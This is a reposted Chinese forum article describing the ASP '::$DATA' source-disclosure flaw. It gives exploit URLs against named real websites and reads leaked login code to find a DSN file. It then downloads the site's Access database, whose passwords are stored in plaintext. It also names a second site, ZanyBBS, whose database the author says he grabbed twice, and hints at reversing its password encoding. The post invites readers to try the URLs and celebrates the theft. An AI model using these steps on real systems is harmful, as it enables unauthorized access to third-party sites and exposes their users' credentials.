ASP 的漏洞 |
|
jackkcg
站務副站長 發表:891 回覆:1050 積分:848 註冊:2002-03-23 發送簡訊給我 |
此為轉載之文章 其實 ASP 的漏洞已經算很少了,想要找到資料庫的實際位置也不簡單.
但程式設計師常常忘記仔細的檢查是否有漏洞,
所以才有可能導致網站資料被竊取的事件發生. 開始舉例: 我們先講一個最簡單的參數 (::$DATA)
這個參數有什麼用呢?很簡單~他可以讓您看到 ASP 的原始程式! http://y2kpts.iii.org.tw/login.asp
http://y2kpts.iii.org.tw/login.asp::$DATA 請同學到上面兩頁看看(要看原始檔唷!)
看到了嗎?沒錯!ASP 的程式碼被我們看見囉! 好!我們打入 ::$DATA 參數後可以在原始檔中看到下面這段. xxxx
alert("請輸入您的 密碼!!")
}
else {
document.f1.action="checkuser.asp" <看到了吧!
document.f1.submit()
}
}
xxxx 看到沒!checkuser.asp 就是檢查帳號密碼的東西!
簡單!如法泡製! http://y2kpts.iii.org.tw/checkuser.asp::$DATA 原始檔如下:
xxxxx
FileName=Server.MapPath("y2k.dsn") <注意這段
Conn.Open "FileDSN=" & FileName
sql="select * from 使用者權限 where 帳號=`" & user & "` and 密碼=`" & passwd & "`"
Set RS=Conn.Execute(sql)
if Not RS.EOF then
xxxxx
end 看!我們找到 DSN 了!y2k.dsn
再來! http://y2kpts.iii.org.tw/y2k.dsn [ODBC]
xxxx
DefaultDir=c:inetpubftprooty2kpts
DBQ=y2k.mdb 看到了吧!他的資料庫就是 y2k.mdb !
試試能不能抓下來! http://y2kpts.iii.org.tw/y2k.mdb 哇!可以下載ㄟ!爽!
下載完趕快看看裡面有啥好料的~
打開看看~裡面有個 使用者權限 的資料表唷!
快打開!哇!~天呀!密碼都沒有編碼過!~
帳號密碼看的一清二處說!~這這...太簡單了吧!?
難道所有的 ASP 網站都能這樣ㄎ一ㄤ資料庫嗎? 答案是否定的!我們是靠著 ::$DATA 參數才能找到資料庫的!
那...要是這參數不能用了呢? 沒關係!還有別的辦法! http://140.119.74.99/ZanyBBS/ 這個站筆者曾經兩度ㄎ一ㄤ到資料庫..
怎麼做到的?他們提供 ZanyBBS 原始程式供下載..
資料庫位置擺明了告訴你嘛!
不過這 Zany 也不是省油的燈!使用者的 PassWord 有經過編碼! 怎麼解?簡單~
”原始程式供下載”~就是說~編碼方式裡面也找的到啦!
看看他是怎麼解碼的~如法泡製即可~
以上是我在ASP技術廣場看到的~~~
真是嚇死人了~~~
------
********************************************************** 哈哈&兵燹 最會的2大絕招 這個不會與那個也不會 哈哈哈 粉好 Delphi K.Top的K.Top分兩個字解釋Top代表尖端的意思,希望本討論區能提供Delphi的尖端新知 K.表Knowlege 知識,就是本站的標語:Open our mind |
本站聲明 |
1. 本論壇為無營利行為之開放平台,所有文章都是由網友自行張貼,如牽涉到法律糾紛一切與本站無關。 2. 假如網友發表之內容涉及侵權,而損及您的利益,請立即通知版主刪除。 3. 請勿批評中華民國元首及政府或批評各政黨,是藍是綠本站無權干涉,但這裡不是政治性論壇! |